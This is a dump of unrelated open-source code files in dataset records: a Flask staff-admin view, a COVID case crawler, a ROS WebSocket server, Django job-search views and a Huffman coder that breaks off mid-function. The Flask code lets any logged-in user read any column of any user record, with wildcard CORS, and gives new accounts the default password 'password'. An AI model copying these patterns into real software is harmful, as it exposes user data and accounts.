list(mongo.db.auth_users.aggregate([\n {\"$match\": {'lname': {'$regex': search_value}, 'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n }]))\n total_records = len(query)\n else:\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n },\n {\"$skip\": start},\n {\"$limit\": length},\n ]))\n total_records = mongo.db.auth_users.find({'role': SECRETARYREFERENCE}).count()\n\n filtered_records = len(query)\n \n table_data = []\n \n for data in query:\n lname = data.get('lname', '')\n fname = data.get('fname', '')\n branch = data.get('branch', [{'name': ''}])[0]\n created_by = data.get('created_by', '')\n created_at = data.get('created_at', '')\n updated_by = data.get('updated_by', '')\n updated_at = data.get('updated_at', '')\n \n table_data.append([\n str(),\n lname,\n fname,\n branch['name'],\n created_by,\n created_at,\n updated_by,\n updated_at,\n ])\n\n response = {\n 'draw': draw,\n 'recordsTotal': filtered_records,\n 'recordsFiltered': total_records,\n 'data': table_data,\n }\n\n return jsonify(response)\n\n\n@bp_lms.route('/get-view-secretary-data', methods=['GET'])\n@login_required\ndef get_view_user_data():\n _column, _id = request.args.get('column'), request.args.get('id')\n\n _data = User.objects(id=_id).values_list(_column)\n\n response = jsonify(result=str(_data[0]),column=_column)\n\n if _column == \"branch\" and _data[0] is not None:\n response = jsonify(result=str(_data[0].id),column=_column)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.status_code = 200\n return response\n\n\n@bp_lms.route('/secretaries/create',methods=['GET','POST'])\n@login_required\ndef create_secretary():\n form = SecretaryForm()\n\n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n\n try:\n secretary = User()\n\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_password(\"password\")\n secretary.is_superuser = False\n\n secretary.created_by = \"{} {}\".format(current_user.fname,current_user.lname)\n\n secretary.save()\n\n flash('New Secretary Added Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n \n return redirect(url_for('lms.secretaries'))\n\n\n@bp_lms.route('/secretaries//edit', methods=['GET', 'POST'])\n@login_required\ndef edit_secretary(oid):\n secretary = User.objects.get_or_404(id=oid)\n form = SecretaryEditForm(obj=secretary)\n\n if request.method == \"GET\":\n\n return admin_edit(\n Secretary,\n form,\n 'lms.edit_secretary',\n oid,\n 'lms.secretaries',\n )\n \n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n \n try:\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_updated_at()\n secretary.updated_by = \"{} {}\".format(current_user.fname,current_user.lname)\n \n secretary.save()\n flash('Secretary Updated Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n\n return redirect(url_for('lms.secretaries'))\n", "repo_name": "likes-team/prime-web-admin", "sub_path": "prime_admin/views/secretary.py", "file_name": "secretary.py", "file_ext": "py", "file_size_in_byte": 6702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.admin.templating.admin_render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 20, "usage_type": "argument"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 16, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 16, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 66, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 66, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 67, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 77, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 77, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 78, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.find", "line_number": 89, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 89, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 56, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects", "line_number": 130, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.json.jsonify", "line_number": 135, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 125, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 125, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 126, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryForm", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 150, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 153, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 157, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 157, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 158, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 158, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 173, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 173, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 142, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 142, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 143, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects.get_or_404", "line_number": 179, "usage_type": "call"}, {"api_name": "app.auth.models.User.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.auth.models.User", "line_number": 179, "usage_type": "name"}, {"api_name": "prime_admin.forms.SecretaryEditForm", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "app.admin.templating.admin_edit", "line_number": 184, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 185, "usage_type": "argument"}, {"api_name": "flask.flash", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 195, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "prime_admin.models.Branch.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "prime_admin.models.Branch", "line_number": 200, "usage_type": "name"}, {"api_name": "app.auth.models.Role.objects", "line_number": 201, "usage_type": "call"}, {"api_name": "app.auth.models.Role", "line_number": 201, "usage_type": "name"}, {"api_name": "flask_login.current_user.fname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 205, "usage_type": "name"}, {"api_name": "flask_login.current_user.lname", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 213, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 176, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 176, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 177, "usage_type": "name"}]}
+{"seq_id": "25955222173", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport datetime, requests, re, os\nfrom num2words import num2words\n\nnumber_dict = {}\nnumber_dict[\"kein\"] = 0\nnumber_dict[\"keine\"] = 0\nnumber_dict[\"keiner\"] = 0\nnumber_dict[\"eine\"] = 1\nnumber_dict[\"einer\"] = 1\n\nfor i in range(1, 501):\n number_dict[ num2words(i, lang='de') ] = i\n \ndef germanWordToInt(w): \n if re.match(\"^[0-9]{1,}$\", w) is not None:\n return int(w)\n else: \n for n in number_dict:\n if ( w.lower() == n ):\n return number_dict[n]\n return False\n \n \ndef getHBNSubPage(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n try:\n r = requests.get('https://www.landkreis-hildburghausen.de' + url.replace(\"&\", \"&\"), headers=headers, allow_redirects=True, timeout=5.0)\n return r.text\n except:\n return False\n \n\ndef getHBNNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n pattern_Subpage = re.compile(r\"([0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{4,4}) \\s*?\")\n pattern_date = re.compile(r\"([0-9]{1,})\\.([0-9]{1,}).([0-9]{2,4}),\\s?([0-9]{1,})[\\.:]([0-9]{1,})\") \n \n num_pattern_T = re.compile(r\"\\s([^\\s]*)\\s(?:positiv\\sgetestete\\sPersonen|Personen\\spositiv)\")\n num_pattern_R = re.compile(r\"([^\\.\\s]*)\\sPersonen[^\\.]*?(?:genesen|überstanden)\")\n num_pattern_D = re.compile(r\"\\s([^\\s]*)\\s(?:Todesfall|Todesfälle|Verstorbene|Tote)\")\n \n replace_array = [\"\", \"
\", \"\", \" \", \"\", \" \", \"\\n\", \"\\t\", \"\\r\" ]\n \n html_replace_dict = {\n \" \": \" \",\n \"ä\": \"ä\",\n \"ö\": \"ö\",\n \"ü\": \"ü\",\n \"Ä\": \"Ä\",\n \"Ö\": \"Ö\",\n \"Ü\": \"Ü\",\n \"ß\": \"ß\"\n }\n \n deceased_cnt = 0\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n \n pmsub = pattern_Subpage.findall( r.text )\n pmsub.reverse() \n \n for pm in pmsub:\n pm_content = getHBNSubPage(pm[1])\n \n for entry in replace_array:\n pm_content = pm_content.replace(entry, \"\")\n \n for entry in html_replace_dict:\n pm_content = pm_content.replace(entry, html_replace_dict[entry])\n \n pd = pattern_date.findall( pm_content )\n \n if ( len(pd) < 1 ):\n continue\n \n timestamp = int(datetime.datetime(int(pd[0][2]), int(pd[0][1]), int(pd[0][0]), int(pd[0][3]) if int(pd[0][3]) < 24 else 23, int(pd[0][4]) ).strftime(\"%s\"))\n \n ps1 = num_pattern_T.findall( pm_content )\n if ( len(ps1) < 0 ):\n continue\n \n num_t = germanWordToInt(ps1[0])\n if num_t is False:\n continue\n \n ps2 = num_pattern_R.findall( pm_content )\n \n num_r = germanWordToInt(ps2[0]) if len(ps2) >= 1 else -1\n if num_r is False:\n num_r = -1\n \n ps3 = num_pattern_D.findall( pm_content )\n num_d = germanWordToInt(ps3[0]) if len(ps3) >= 1 else -1\n if num_d is False: \n num_d = -1\n \n if ( num_d == -1 ):\n num_d = deceased_cnt\n else:\n deceased_cnt = num_d\n \n num_h = -1\n num_s = -1\n \n return [timestamp, num_t, num_r, num_d, num_h, num_s]\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_hbn.csv\"\n URL = 'https://www.landkreis-hildburghausen.de/Aktuelles-Covid-19/Aktuelles-zu-Covid-19-im-Landkreis/Aktuelle-Meldungen-aus-dem-Landkreis'\n \n num_latest = getHBNNumbers(URL)\n \n if (num_latest != False) and (num_latest[1] > -1):\n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]+1] ):\n if ( ( num_latest[i[0]+1] != -1 ) and ( i[0] != 2 ) ):\n value_changed = True\n \n # deceased number is not always included in new reports\n if value_changed:\n num_latest[3] = max(num_latest[3], int(last_values[2]))\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], num_latest[5], URL))\n f.close()\n", "repo_name": "micb25/corona-jena", "sub_path": "crawler/crawler_hbn.py", "file_name": "crawler_hbn.py", "file_ext": "py", "file_size_in_byte": 5061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "num2words.num2words", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "33881369147", "text": "\"\"\"GCS WebUI WebSockets server\n\nListens on several topics to serve WebSocket connections from our GCS WebUI, \nalso publishes to /pathy/dms, on request of the WebUI.\n\nSee /gcs/webui.html in the repo for the client-side part.\nNot to be confused with the Mavlink ground control software (QGroundControl/\nMission Planner).\n\"\"\"\n\nimport sys, base64, json\nfrom enum import Enum\nfrom typing import Any\n\nimport cv2\nimport numpy as np\n\nimport rclpy\nfrom rclpy.node import MsgType, Node\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import String, Empty\n\nimport asyncio\nimport websockets\n\n\ndef opencv_to_b64(img: np.dtype, img_type: str = \"png\") -> str:\n is_success, mask_buf = cv2.imencode(f\".{img_type}\", img)\n if not is_success:\n raise Exception(\"Could not encode image\")\n b64 = base64.b64encode(mask_buf.tobytes()).decode('utf-8')\n return b64\n\ndef b64_to_opencv(b64: str) -> np.dtype:\n img_bytes = base64.b64decode(b64)\n as_np = np.frombuffer(img_bytes, np.uint8)\n img = cv2.imdecode(as_np, cv2.IMREAD_ANYCOLOR)\n return img\n\nclass MessageType(Enum):\n RGB = \"RGB\"\n MASK = \"MASK\"\n PING = \"PING\" # https://stackoverflow.com/questions/10585355/sending-websocket-ping-pong-frame-from-browser\n PONG = \"PONG\"\n DMS = \"DMS\"\n STEER = \"STEER\"\n OFFLOADED_INFERENCE = \"OFFLOADED_INFERENCE\"\n\ndef create_websocket_msg(message_type: MessageType, data: Any):\n return json.dumps({\n \"type\": message_type.value,\n \"data\": data\n })\n\ndef parse_websocket_msg(msg: str):\n msg_obj = json.loads(msg)\n msg_type = MessageType[str(msg_obj[\"type\"])]\n msg_data = msg_obj[\"data\"]\n return msg_type, msg_data\n\ndef async_to_non_blocking(loop: asyncio.AbstractEventLoop, callback):\n def non_blocking_callback(**args): # TODO: args, kargs??\n loop.create_task(callback(**args))\n return non_blocking_callback\n\n\nclass GcsWebuiWsServer(Node):\n def __init__(self):\n super().__init__('gcs_webui_ws_server')\n loop = asyncio.get_event_loop()\n self.create_subscription(\n Image, '/pathy/rgb', async_to_non_blocking(loop, self._on_rgb), 10\n )\n # self.create_subscription(Image, '/pathy/mask', self._on_mask, 10)\n self.create_subscription(\n String, '/pathy/steering', \n async_to_non_blocking(loop, self._on_steering), 10\n )\n self._mask_pub = self.create_publisher(Image, '/pathy/mask', 10)\n self._dms_pub = self.create_publisher(Empty, '/pathy/dms', 10)\n self._bridge = CvBridge()\n self._clients = set()\n self._loop = asyncio.get_event_loop()\n\n async def init(self):\n await self._init_ws()\n self.get_logger().info('Init OK')\n \n async def serve_forever(self):\n self.get_logger().info('Running...')\n while not self.executor or self.executor.context.ok():\n rclpy.spin_once(self, timeout_sec=0)\n await asyncio.sleep(0) # yield\n\n async def _init_ws(self):\n await websockets.serve(self._on_new_client, \"0.0.0.0\", 5678)\n self.get_logger().info('Websocket init OK')\n\n async def _on_rgb(self, img_msg: Image):\n b64_img = opencv_to_b64(\n self._bridge.imgmsg_to_cv2(img_msg), img_type=\"jpg\")\n ws_msg = create_websocket_msg(MessageType.RGB, b64_img)\n await self._send_to_all(ws_msg)\n\n async def _on_mask(self, img_msg: Image):\n img = self._bridge.imgmsg_to_cv2(img_msg)\n await self._on_mask_async_parsed(img)\n\n async def _on_mask_async_parsed(self, img: np.dtype):\n return_msg_data = {\n \"type\": MessageType.MASK.value,\n \"data\": opencv_to_b64(img)\n }\n await self._send_to_all(json.dumps(return_msg_data))\n\n def _on_steering(self, msg: String):\n self._loop.create_task(self._on_steering_async(msg))\n\n async def _on_steering_async(self, msg: String):\n msg_obj = json.loads(msg.data)\n return_msg_data = {\n \"type\": MessageType.STEER.value,\n \"data\": {\n \"steer\": msg_obj[\"steer\"],\n \"throttle\": msg_obj[\"throttle\"]\n }\n }\n await self._send_to_all(json.dumps(return_msg_data))\n \n async def _send_to_all(self, data: str):\n if len(self._clients) > 0:\n await asyncio.gather(*[c.send(data) for c in self._clients], return_exceptions=False)\n\n async def _on_new_client(self, socket, path):\n self.get_logger().info('New client')\n self._clients.add(socket)\n try:\n async for msg in socket:\n await self._handle_ws_message(socket, msg)\n except websockets.ConnectionClosedOK:\n self.get_logger().info(\"Goodbye\")\n pass\n finally:\n self._clients.remove(socket)\n\n async def _handle_ws_message(self, socket, msg):\n msg_type, msg_data = parse_websocket_msg(msg)\n if msg_type == MessageType.PING:\n return_msg_data = {\n \"type\": MessageType.PONG,\n \"data\": None\n }\n await socket.send(json.dumps(return_msg_data))\n elif msg_type == MessageType.DMS:\n self.get_logger().info(\"DMS\")\n self._dms_pub.publish(Empty())\n elif msg_type == MessageType.OFFLOADED_INFERENCE:\n self.get_logger().info(\"Offloaded inference\")\n mask = b64_to_opencv(msg_data)\n mask_msg = self._bridge.cv2_to_imgmsg(np.array(mask))\n self._mask_pub.publish(mask_msg)\n await self._on_mask_async_parsed(mask)\n else:\n raise Exception(f\"Unknown message type: {msg_type}\")\n\n\nasync def main_async(args=None):\n rclpy.init(args=args)\n ws_server = GcsWebuiWsServer()\n await ws_server.init()\n await ws_server.serve_forever()\n ws_server.destroy_node()\n rclpy.shutdown()\n\n\ndef main(args=None):\n asyncio.get_event_loop().run_until_complete(main_async(args))\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "repo_name": "ubipo/pathy", "sub_path": "ros/pathy/pathy/gcs_webui_ws_server.py", "file_name": "gcs_webui_ws_server.py", "file_ext": "py", "file_size_in_byte": 6017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.dtype", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.dtype", "line_number": 35, "usage_type": "attribute"}, {"api_name": "enum.Enum", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 57, "usage_type": "call"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rclpy.node.Node", "line_number": 68, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 71, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 73, "usage_type": "argument"}, {"api_name": "std_msgs.msg.String", "line_number": 77, "usage_type": "argument"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 80, "usage_type": "argument"}, {"api_name": "std_msgs.msg.Empty", "line_number": 81, "usage_type": "argument"}, {"api_name": "cv_bridge.CvBridge", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 84, "usage_type": "call"}, {"api_name": "rclpy.spin_once", "line_number": 93, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "websockets.serve", "line_number": 97, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 115, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 117, "usage_type": "name"}, {"api_name": "std_msgs.msg.String", "line_number": 120, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 133, "usage_type": "call"}, {"api_name": "websockets.ConnectionClosedOK", "line_number": 141, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "rclpy.init", "line_number": 169, "usage_type": "call"}, {"api_name": "rclpy.shutdown", "line_number": 174, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 182, "usage_type": "attribute"}]}
+{"seq_id": "27921765542", "text": "from django.shortcuts import render\nfrom job_search.models import Job\nfrom .forms import SearchBarForm\n\nfrom django.db.models import Q\n\nfrom functools import reduce\nimport operator\n\n# Create your views here.\n\ndef job_search_index(request):\n jobs = Job.objects.all()\n\n query = \"\"\n results = None\n\n form = SearchBarForm()\n if request.method == 'POST':\n form = SearchBarForm(request.POST)\n if form.is_valid():\n query = form.cleaned_data[\"query\"]\n if ',' in query:\n query = query.split(',')\n else:\n query = query.split(' ')\n\n print(query)\n\n descResults = Job.objects.filter(reduce(operator.and_, [Q(description__icontains=term) for term in query]))\n cityResults = Job.objects.filter(reduce(operator.and_, [Q(city__icontains=term) for term in query]))\n stateResults = Job.objects.filter(reduce(operator.and_, [Q(state__icontains=term) for term in query]))\n results = descResults | cityResults | stateResults\n else:\n form = SearchBarForm()\n\n context = {\n 'jobs': jobs,\n 'form': form,\n 'query': query if query else \"\",\n 'results': results\n }\n return render(request, 'job_search_index.html', context)\n\ndef job_detail(request, pk):\n job = Job.objects.get(pk=pk)\n context = {\n 'job': job\n }\n return render(request, 'job_detail.html', context)", "repo_name": "Gabriel0110/Entry-Level-X", "sub_path": "job_search/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "job_search.models.Job.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 13, "usage_type": "name"}, {"api_name": "forms.SearchBarForm", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 20, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 30, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 31, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 32, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 32, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "40715480860", "text": "################################################################\n# FILE: hzlib.py\n# WRITER: Roi Greenberg + roigreenberg + 305571234\n# EXERCISE : intro2cs ex9 2013-2014\n# Description: implement some function about Huffman tree and\n# compress and decompress data\n################################################################\n\nimport collections\nfrom bisect import bisect\n'''\nThis module contains several function for compress and decompress data, using\nthe Huffman code algorithm.\n'''\n\nMAGIC = b\"i2cshcfv1\"\nLEFT_TREE = 0\nRIGHT_TREE = 1\n\ndef symbol_count(data):\n \"\"\"the function return dictionary from item to number of returns in data\n Args: data - a data\n \"\"\"\n return collections.Counter(data)\n\n\ndef make_huffman_tree(counter):\n \"\"\"the function create a huffman tree of a given dictionary from item to\n number of returns\n Return tree of tuple of tuples represent the tree or None if dictionary\n is empty\n Args: counter - a dictionary (output of symbol_data)\n \"\"\"\n # create a list from the dictonary and sorted it from low repeats to high\n # and high value to low\n sort_list = sorted([(tuple0, counter[tuple0]) for tuple0 in counter], \\\n reverse=True )\n sort_list.sort(key=lambda leaf: leaf[1])\n\n # run until have only 1 tuple\n while len(sort_list) > 1:\n # take the first 2 tuples\n tuple1 = sort_list.pop(0)\n tuple2 = sort_list.pop(0)\n\n # calculate the combined repeats\n count = tuple1[1] + tuple2[1]\n\n #create new tuple of both tuple\n parent = ((tuple2[0], tuple1[0]), count)\n\n #create a list of all the reapets\n counts = [repeats[1] for repeats in sort_list]\n\n #insert the new tuple to the list in the right place\n sort_list.insert(bisect(counts, count), parent)\n\n return sort_list[0][0] if sort_list else None\n\n\ndef build_codebook(huff_tree):\n \"\"\"create a codebook of the Huffman tree\n the function recieve a huffman tree and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n Args:\n huff_tree - a coded tree of a recursive tuple structure\n (same structure of output of privious function).\n bin_item - a string. default is \"\".\n codebook - a dictionary. default is {}.\n \"\"\"\n new_codebook = {}\n def codebook(huff_tree, n=\"\"):\n # return empty dictionary in tree is empty\n if not huff_tree:\n return {}\n # return the dictionary in case tree is only 1 leaf\n elif type(huff_tree) is not tuple:\n return {huff_tree: (1, 0)}\n\n # the left branch\n 